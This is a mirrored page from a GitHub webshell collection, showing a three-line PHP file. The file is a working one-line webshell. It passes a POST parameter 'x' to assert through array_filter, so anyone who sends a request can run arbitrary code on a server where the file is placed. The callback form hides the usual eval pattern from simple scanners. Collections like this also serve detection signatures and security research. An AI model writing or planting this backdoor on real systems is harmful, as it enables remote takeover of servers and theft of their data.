mirror of
https://github.com/tennc/webshell
synced 2025-03-16 06:16:55 +00:00
3 lines
56 B
PHP
3 lines
56 B
PHP
<?php
|
|
array_filter(array($_POST['x']),'assert');
|
|
?>
|